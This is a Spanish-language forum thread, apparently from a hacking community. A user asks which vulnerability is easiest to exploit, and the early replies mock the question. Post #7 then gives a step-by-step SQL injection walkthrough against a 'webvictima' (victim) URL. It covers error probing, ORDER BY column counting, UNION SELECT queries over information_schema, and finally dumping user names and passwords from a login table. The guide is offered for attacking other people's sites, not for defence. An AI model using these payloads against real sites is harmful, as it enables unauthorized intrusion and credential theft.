Resultados 1 al 8 de 8

Tema: Quiero saber que vulnerabilidad es mas facil de usar

  1. #1 Quiero saber que vulnerabilidad es mas facil de usar 
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    Quien me dice que vulnerabilbidad es mas facil de usar y cual es la mas dificil ?. Si tienes un manual sobre vulnerabilidades me ayudaria.
    Citar  
     

  2. #2  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    La vulnerabilidad más fácil de usar es la vulnerabilidad de la que más información posees... puesto que si no la conoces será jodida .

    Resumiendo, haz el favor de hacer preguntas coherentes. Por cierto:

    Cita Iniciado por chico1988
    Si tienes un manual sobre vulnerabilidades me ayudaria.
    ¿Por qué hay muchos que dirigiéndose al foro (mucha gente) dice cosas como "tienes" que va dirigido a una persona en concreto?

    Un saludo.
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    www.rae.es <-- Empieza por este manual
    chico1988 documentate mas sobre todo en concreto ,servicios y demas antes de preguntar. Explotar una vulnerabilidad no es algo nada facil sin unos conocimientos medios. Yo no tengo ni idea de como se hace y me manejo en este mundillo bastante.

    PD: Mi post 666 The Number Of The Beast ^_____^
    http://www.project-longinus.es
    Citar  
     

  4. #4  
    Medio
    Fecha de ingreso
    Sep 2006
    Mensajes
    89
    Descargas
    0
    Uploads
    0
    post 666 y escrito a las 0:00 uhhhh xDD
    Citar  
     

  5. #5  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.280
    Descargas
    7
    Uploads
    0
    Cita Iniciado por boycot007
    post 666 y escrito a las 0:00 uhhhh xDD
    The daemons are no longer just in my mind xDDDD

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    Muchas gracias para la ayuda y para www.rae.es
    Última edición por chico1988; 07-11-2006 a las 22:49
    Citar  
     

  7. #7  
    Iniciado
    Fecha de ingreso
    Sep 2009
    Mensajes
    20
    Descargas
    0
    Uploads
    0
    En mi opinion las vulnerabilidades de sql son bastantes sencillas te dejo una guia :

    primero debes probar si la web es vulnerable a nuestra injection para esto :
    a la web se le agrega ' al final y quedara asi :
    http://www.webvictima.org/article.php?id=10253'
    si dice q hay un error en la base de datos sql ... quiere decir q es vulnerable

    despues tenemos que fijarnos el numero de columnas para esto se ordenan de la siguiente forma :

    http://www.webvictima.org/article.php?id=-10253 order by 1/*

    y se va cambiando el numero hasta q diga :

    Unknown column 'el numero q probaste' in 'order clause'


    http://www.webvictima.org/article.php?id=-10253 order by 10/* no tira error
    http://www.webvictima.org/article.php?id=-10253 order by 15/* aca te dice :
    Unknown column '15' in 'order clause'

    esto significa que la pagina tiene 14 columnas !
    ahora necesitamos encontrar la columna "vulnerable" y escribis esto:

    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--

    vas a ver dos numeros en la web, hay uno que esta remarcado o aparece arriba, esa es la columna que buscabamos, suponganse que la columna era la numero 2 quedaria asi ...

    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14 --

    despues para ver la info de la base de datos necesitas escribir :

    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.schemata

    ahora para averiguar como se llama la tabla donde se guardan los "logins" :

    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 ,10,11,12,13,14 from information_schema.tables where table_schema=database()--

    en este caso se llamaba "login" xD :

    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.columns where table_name=login

    si esa te da un error, no te preocupes intenta con esto :
    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8, 9,10,11,12,13,14 from information_schema.columns where table_name=char(108,111,103,105,110)

    y ahi esta
    ahora necesitas id,user,pass,user_id y password y la injection quedaria asi :

    http://www.webvictima.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3 ,4,5,6,7,8,9,10,11,12,13,14 from login


    z1dr0ff.- | HACKERS BROTHERS
    Citar  
     

  8. #8  
    Iniciado
    Fecha de ingreso
    Sep 2009
    Mensajes
    20
    Descargas
    0
    Uploads
    0
    esa es una injection entre tantas que hay
    Citar  
     

Temas similares

  1. Ubuntu más fácil de usar, Automatix
    Por Grenuille en el foro LINUX - MAC - OTROS
    Respuestas: 1
    Último mensaje: 23-08-2006, 12:35
  2. Joiner Muy Facil De Usar!!
    Por 40Che en el foro INTRUSION
    Respuestas: 4
    Último mensaje: 12-08-2006, 21:44
  3. Respuestas: 3
    Último mensaje: 08-06-2006, 05:47
  4. Como usar vulnerabilidad en phpBB
    Por clarinetista en el foro VULNERABILIDADES
    Respuestas: 7
    Último mensaje: 03-01-2005, 10:22
  5. Quiero empezar a usar linux
    Por Almorca en el foro LINUX - MAC - OTROS
    Respuestas: 8
    Último mensaje: 28-11-2003, 20:32

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •